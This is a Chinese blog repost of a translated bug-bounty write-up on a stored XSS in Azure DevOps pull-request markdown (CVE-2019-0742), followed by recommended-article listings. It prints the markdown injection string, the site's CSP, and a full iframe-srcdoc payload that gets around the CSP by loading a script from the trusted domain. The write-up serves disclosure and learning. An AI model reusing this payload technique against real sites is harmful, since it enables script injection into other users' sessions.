存储型xss_微软旗下协同平台Azure DevOps的存储型XSS漏洞(绕过CSP)

最新推荐文章于 2023-04-12 11:00:17 发布
最新推荐文章于 2023-04-12 11:00:17 发布
阅读量188 收藏 1
点赞数
文章标签: 存储型xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39545329/article/details/111325231
版权

d96b221419e138d4d8c6ce6e6c7eea50.png

最近,微软启动了一个针对Azure DevOps的漏洞悬赏计划。在一个新的应用上找漏洞总是如此的吸引人。让我们开始吧!

我们的目标是https://dev.azure.com,这是一个由Microsoft开发的Git的web服务器。我在其中的markdown编辑器中发现了一个XSS漏洞。

当你创建一个Git的pull请求时,可以使用markdown添加一些注释。而由于网站markdown的渲染未能转义某些字符,最后导致出现XSS漏洞。

我用大量XSS的payload不停在markdown输入框进行复制粘贴来测试,发现浏览器会把我重定向到一个奇怪的URL。我试图找出最短的payload,经过多次尝试,我发现如果我把HTML代码放在2个$和一个%之间,那么这个HTML代码就会神奇地出现在回应页面中,例如:

$%<img src=1>$

c002f22ee02cad1b1feac433c5e4ab48.png

我尝试使用img标签的on error来触发XSS,但什么都没有发生。我在Chrome的控制台中看到了以下错误。

1?_a=overview:1 Refused to execute inline event handler because it violates the following Content Security Policy directive: "sc ript-src 'unsafe-inline' *.visualstudio.com *.dev.azure.com dev.azure.com https://cdn.vsassets.io https://vsassetscdn.azure.cn https://ms.gallery.vsassets.io https://ms.gallerycdn.vsassets.io https://ms.gallerycdn.azure.cn *.ensighten.com *.microsoft.com *.google-analytics.com 'nonce-JNv3ZUluxXSBwNijHMtlKg=='". Note that 'unsafe-inline' is ignored if either a hash or nonce value is present in the source list.

c2c5cd108bcf2f543d517c474b4454be.png

原来被CSP拦截了。貌似是因为unsafe-inline的原因。

而当我使用最原始的alert函数时,CSP表示这是一个unsafe-eval

0626c7434be13dd3145c0ed36471ddd4.png

OK,由于dev.azure.com本身在白名单中,所以我选择将插入代码的SRC指向一个包含payload的repo文件。

b1c5fe97aac304ceea4fe832b01596af.png

ec922caa6bcde1bc72aa0fde2079d562.png

??貌似sc ript受前端框架影响也不行。看样子我需要找到彻底绕过CSP的方法,或者绕过这个前端框架。

首先,完整的CSP规则如下:

content-security-policy: default-src 'none'; font-src *.visualstudio.com *.dev.azure.com dev.azure.com *.vsassets.io vsassetscdn.azure.cn ms.gallery.vsassets.io ms.gallerycdn.vsassets.io ms.gallerycdn.azure.cn *.microsoft.com *.sharepointonline.com; style-src 'unsafe-inline' *.visualstudio.com *.dev.azure.com dev.azure.com cdn.vsassets.io vsassetscdn.azure.cn ms.gallery.vsassets.io ms.gallerycdn.vsassets.io ms.gallerycdn.azure.cn; connect-src *.visualstudio.com wss://*.visualstudio.com *.dev.azure.com dev.azure.com wss://*.dev.azure.com wss://dev.azure.com *.vsassets.io vsassetscdn.azure.cn ms.gallery.vsassets.io ms.gallerycdn.vsassets.io ms.gallerycdn.azure.cn *.blob.core.windows.net; img-src http: https: blob: data:; sc ript-src 'unsafe-inline' *.visualstudio.com *.dev.azure.com dev.azure.com https://cdn.vsassets.io https://vsassetscdn.azure.cn https://ms.gallery.vsassets.io https://ms.gallerycdn.vsassets.io https://ms.gallerycdn.azure.cn *.ensighten.com *.microsoft.com *.google-analytics.com 'nonce-BByveBAMp0eRn6Ll29C7Lw=='; child-src * blob: tfs:; fr ame-src * blob: tfs:; media-src http: https:;

其中frame-src * blob: tfs:;引起了我的注意。难道if rame可以?

aea6bb73a42fc15ccf7de700eb251bfc.png

最后的payload

$
<iframe srcdoc="<sc ript src='https://dev.azure.com/md5_salt/deadbeef-1337-1337-1337-1337/_apis/git/repositories/deadbeef-1337-1337-1337-1337/Items?path=%2F1.js&versionDesc riptor%5BversionOptions%5D=0&versionDesc riptor%5BversionType%5D=0&versionDesc riptor%5Bversion%5D=master&download=true&resolveLfs=true&%24format=octetStream&api-version=5.0-preview.1'></sc ript>"></if rame>
$

微软在接到我的报告后,立马处理这个漏洞,并标记为CVE-2019-0742。

感谢你的阅读!

本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场

来源:微软旗下协同平台Azure DevOps的存储型XSS漏洞(绕过CSP)

原文:https://5alt.me/2019/02/xss-in-azure-devops/

白帽汇从事信息安全,专注于安全大数据、企业威胁情报。

公司产品:FOFA-网络空间安全搜索引擎、FOEYE-网络空间检索系统、NOSEC-安全讯息平台。

为您提供:网络空间测绘、企业资产收集、企业威胁情报、应急响应服务。

weixin_39545329
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
微软SharePoint发现高危XSS漏洞
weixin_33768481的博客
05-01 182
近日,微软安全应急小组确认了微软SharePoint Server 2007产品中的严重跨站脚本漏洞(XSS)的存在。该漏洞可以通过浏览器被利用,使***通过漏洞程序执行任意的JavaScript代码。该漏洞的具体细节已经被公布,微软预计在本周末发布的安全报告上将 提供补丁修复这一漏洞。 下面是关于这个漏洞的一些细节: 该漏洞是没有正确的处理“/_la...
微软Teams漏洞使用户易受XSS攻击
smellycat000的专栏
07-15 304
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士安全研究员发现,攻击者可滥用微软 Teams 中的热门贴纸 (sticker) 特性,执行跨站点脚本 (XSS) 攻击。近几年来由于新冠肺炎疫情的原因,很多组织机构尽量采用在家办公模式,促使微软 Teams以及视频会议服务如Zoom 等服务热度居高不下。由于用户很多,因此微软 Teams 中的任何漏洞都可能产生广泛影响。...
拒绝执行内联事件处理程序,因为它违反了以下内容安全策略指令
全栈攻城狮的博客
05-27 5430
Refused to execute inline event handler because it violates the following Content Security Policy directive: “script-src ‘self’ ‘unsafe-inline’ ‘unsafe-eval’ at.alicdn.com f.alicdn.com g.alicdn.com lo...
html+php内联执行JavaScript是报错
Leloz的博客
08-05 2214
拒绝运行JavaScript URL,因为它违反了以下内容安全策略指令:“script-src ‘self’”。要启用内联执行,需要使用’unsafe-inline’关键字、hash (‘sha256-…’)或nonce (‘nonce-…注意,哈希值不适用于事件处理程序、样式属性和javascript:导航,除非有’unsafe-hash '关键字。在header方法中增加。...
electron报错:Refused to execute inline event handler because it violates the following Content 。。。
github_53963510的博客
04-12 1604
electron 页面添加 onClick 点击事件报错:Refused to execute inline event handler because it violates the following Content Security Policy directive: "script-src 'self'". Either the 'unsafe-inline' keyword, a hash ('sha256-...'), or a nonce ('nonce-...') is required t
YXcms-含有存储XSS漏洞的源码包(1).zip
12-31
YXcms-含有存储XSS漏洞的源码包,亲测真实有效,可用,如有侵权,请联系CSDN管理员删除即可
YXcms-含有存储XSS漏洞的源码包
03-17
YXcms-含有存储XSS漏洞的源码包,亲测真实有效可用,如有侵权,请联系CSDN管理员删除即可
奇安信安全扫描漏洞解决路径遍历和存储xss和反射xss攻击漏洞
11-09
亲测可用,中级漏洞,解决服务器段请求伪造 final String forURL = ESAPI.encoder().encodeForURL(url); restTemplate.exchange(forURL, HttpMethod.GET,new HttpEntity<String>(headers), List.class, params);
(华科企业网站管理系统)hkqyglxt-含有存储XSS漏洞的源码包.rar
03-24
hkqyglxt-含有存储XSS漏洞的源码包,亲测真实有效,可用,如有侵权,请联系CSDN管理员删除即可
存储Xss成因及挖掘方法
02-21
存储Xss成因及挖掘方法
React使用CSP
weixin_34315189的博客
10-19 754
2019独角兽企业重金招聘Python工程师标准>>> ...
常见web安全漏洞-暴力破解,xss,SQL注入,csrf
GaLeng_Yang的博客
02-24 2823
on client --- 在前端进行验证码的校验,这个时候驶入正确的验证码提交,进行抓包后,我们通过修改密码和账号发现我们不需要再对验证码进行修改,从而绕过了验证码,实现暴力破解。--- 攻击者在HTTP请求中注入恶意的SQL代码,服务器使用参数构建数据库SQL命令时,恶意SQL被一起构造,并在数据库中执行。--- 指攻击者通过篡改网页,嵌入恶意脚本程序,在用户浏览网页时,控制用户浏览器进行恶意操作的一种攻击方式。交互的数据会被存在在数据库里面,永久性存储,一般出现在留言板,注册等页面。
ASP.NET Core中使用Csp标头对抗Xss攻击
qq_39110534的博客
09-04 438
内容安全策略(CSP)是一个增加的安全层,可帮助检测和缓解某些类的攻击,包括跨站点脚本(XSS)和数据注入攻击。这些攻击用于从数据窃取到站点破坏或恶意软件分发的所有内容(深入CSP) 简而言之,CSP是网页控制允许加载哪些资源的一种方式。例如,页面可以显式声明允许从中加载JavaScript,CSS和图像资源。这有助于防止跨站点脚本(XSS)攻击等问题。 它也可用于限制协议...
2021 OWASP TOP 10 漏洞指南
悦分享
07-31 3760
​ 在开放Web应用基金会致力于创造一个更安全的网络应用环境。它免费提供文章、工具、技术和论坛,让每个开发人员都能创建安全的代码。其最著名的项目之一是 OWASP Top 10。
浅谈XSS漏洞原理
av11566的博客
04-14 3432
今日简单复习了一下XSS漏洞
针对通过 SSH 连接到 Azure Linux VM 时发生的失败、错误或被拒绝问题进行故障排除...
weixin_30480651的博客
09-20 247
本文内容 快速故障排除步骤 排查 SSH 连接问题的可用方法 使用 Azure 门户 使用 Azure CLI 2.0 使用 VMAccess 扩展 使用 Azure CLI 1.0 重新启动 VM 重新部署 VM 使用经典部署模创建的 VM 其他资源 尝试连接到 Linux 虚拟机 (VM) 时,有多种原因可能会导致安全外壳 (SSH) 错误、SSH ...
使用 Azure Web 应用防火墙拦截黑客攻击
dotNET跨平台
08-10 412
点击上方蓝字关注“汪宇杰博客”导语开发或运维过网站的朋友总免不了遇到不怀好意的访客。互联网上有许多全自动黑客工具及脚本,可以扫描你的网站是否有已知安全漏洞,并全自动发起攻击,企图夺取服务...
JAVA Web应用常见漏洞与修复建议
最新发布
12-09
本资源主要探讨了几个常见的安全漏洞,包括跨站脚本(XSS)攻击,特别是存储XSS,并提供了相应的修复建议。 跨站脚本(XSS)是一种常见的网络攻击方式,分为反射、DOM存储存储XSS是最危险的一种,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值